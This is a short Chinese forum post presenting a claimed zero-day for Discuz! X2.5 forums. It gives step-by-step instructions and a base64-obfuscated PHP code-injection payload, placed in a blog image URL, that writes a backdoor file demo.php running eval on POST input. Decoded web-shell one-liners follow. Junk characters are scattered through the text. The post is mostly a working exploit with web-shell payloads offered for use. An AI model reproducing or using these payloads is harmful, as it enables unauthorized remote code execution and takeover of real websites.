DZ X2.5最新0day" ]* s4 v- a1 u! Z# |! [$ B
1.注册任意账户
" I5 \- d% M: U$ n T @0 a2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了
9 w1 ?3 a9 S- V! C5 [3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码5 a2 p5 [! P) @( K$ @9 d$ S
<?php @eval($_POST[c]); ?>ok
4 p5 I7 z& `8 D- r4 H8 h) }<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
! V9 X ]2 ^$ W% Y$ R4.访问日志,论坛根目录下生成demo.php,一句发密码C |